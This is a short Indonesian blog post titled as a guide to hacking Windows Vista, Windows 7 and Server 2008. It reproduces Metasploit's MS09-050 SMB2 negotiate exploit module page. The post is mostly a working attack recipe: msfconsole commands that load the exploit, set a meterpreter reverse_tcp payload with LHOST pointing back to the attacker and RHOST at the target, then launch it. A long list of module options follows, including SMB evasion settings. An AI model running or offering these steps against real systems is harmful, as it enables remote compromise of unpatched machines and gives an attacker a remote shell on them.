Rabu, 18 Mei 2011

Hacking Windows Vista, Windows 7, Windows 2008 Server - Metasploit Framework

Tool: Metasploit Framework
Download: http://www.metasploit.com/download/

Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference

This module exploits an out of bounds function table dereference in the SMB request validation code of the SRV2.SYS driver included with Windows Vista, Windows 7 release candidates (not RTM), and Windows 2008 Server prior to R2. Windows Vista without SP1 does not seem affected by this flaw.

Exploit Targets

* 0 - Windows Vista SP1/SP2 and Server 2008 (x86) (default)

Usage Information

$ msfconsole

## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##

msf > use exploit/windows/smb/ms09_050_smb2_negotiate_func_index
msf exploit(ms09_050_smb2_negotiate_func_index) > show payloads
msf exploit(ms09_050_smb2_negotiate_func_index) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ms09_050_smb2_negotiate_func_index) > set LHOST [MY IP ADDRESS]
msf exploit(ms09_050_smb2_negotiate_func_index) > set RHOST [TARGET IP]
msf exploit(ms09_050_smb2_negotiate_func_index) > exploit


Module Options

RHOST => The target address
RPORT => The target port (default: 445)
WAIT => The number of seconds to wait for the attack to complete. (default: 180)
CHOST => The local client address
CPORT => The local client port
ConnectTimeout => Maximum number of seconds to establish a TCP connection
ContextInformationFile => The information file that contains context information
DisablePayloadHandler => Disable the handler code for the selected payload
EnableContextEncoding => Use transient context when encoding payloads
NTLM::SendLM => Always send the LANMAN response (except when NTLMv2_session is specified)
NTLM::SendNTLM => Activate the 'Negotiate NTLM key' flag, indicating the use of NTLM responses
NTLM::SendSPN => Send an avp of type SPN in the ntlmv2 client Blob, this allow authentification on windows Seven/2008r2 when SPN is required
NTLM::UseLMKey => Activate the 'Negotiate Lan Manager Key' flag, using the LM key when the LM response is sent
NTLM::UseNTLM2_session => Activate the 'Negotiate NTLM2 key' flag, forcing the use of a NTLMv2_session
NTLM::UseNTLMv2 => Use NTLMv2 instead of NTLM2_session when 'Negotiate NTLM2' key is true
Proxies => Use a proxy chain
SMB::ChunkSize => The chunk size for SMB segments, bigger values will increase speed but break NT 4.0 and SMB signing
SMB::Native_LM => The Native LM to send during authentication
SMB::Native_OS => The Native OS to send during authentication
SMB::VerifySignature => Enforces client-side verification of server response signatures
SMBDirect => The target port is a raw SMB service (not NetBIOS)
SMBDomain => The Windows domain to use for authentication
SMBName => The NetBIOS hostname (required for port 139 connections)
SMBPass => The password for the specified username
SMBUser => The username to authenticate as
SSL => Negotiate SSL for outgoing connections
SSLVersion => Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
WORKSPACE => Specify the workspace for this module
WfsDelay => Additional delay when waiting for a session
SMB::obscure_trans_pipe_level => Obscure PIPE string in TransNamedPipe (level 0-3)
SMB::pad_data_level => Place extra padding between headers and data (level 0-3)
SMB::pad_file_level => Obscure path names used in open/create (level 0-3)
SMB::pipe_evasion => Enable segmented read/writes for SMB Pipes
SMB::pipe_read_max_size => Maximum buffer size for pipe reads
SMB::pipe_read_min_size => Minimum buffer size for pipe reads
SMB::pipe_write_max_size => Maximum buffer size for pipe writes
SMB::pipe_write_min_size => Minimum buffer size for pipe writes
TCP::max_send_size => Maximum tcp segment size. (0 = disable)
TCP::send_delay => Delays inserted before every send. (0 = disable)

Source: http://www.metasploit.com/modules/exploit/windows/smb/ms09_050_smb2_negotiate_func_index

Tidak ada komentar:

Poskan Komentar